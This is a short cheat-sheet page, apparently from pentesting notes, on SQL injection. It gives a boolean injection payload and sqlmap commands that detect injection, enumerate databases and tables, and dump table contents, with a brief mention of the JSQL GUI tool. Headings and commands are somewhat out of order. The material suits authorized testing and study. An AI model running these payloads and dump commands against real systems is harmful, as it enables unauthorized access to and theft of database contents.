SQL Injection
Last updated
Was this helpful?
Last updated
Was this helpful?
Boolean Attacks
' OR 1=1; -- -
sqlmap -u <url-to-check>
Check if injection exists
sqlmap -r Post.req sqlmap -u "" -p id sqlmap -u "" --data="user=admin&password=admin"
Get database if injection Exists
sqlmap -r login.req --dbs sqlmap -u "" -p id --dbs sqlmap -u "" --data="user=admin&password=admin" --dbs\
Get Tables in a Database
Get data in a Database tables
JSQL GUI
is a GUI application that can fetch database from sql injection, From GET
request [the parameter being in the URL as injection.php?id=123
]
sqlmap -r login.req -D dbname --tables sqlmap -u "" -p id -D dbname --tables sqlmap -u "" --data="user=admin&password=admin" -D dbname --tables
sqlmap -r login.req -D dbname -T table_name --dump sqlmap -u "" -p id -D dbname -T table_name --dump sqlmap -u "" --data="user=admin&password=admin" -D dbname -T table_name --dump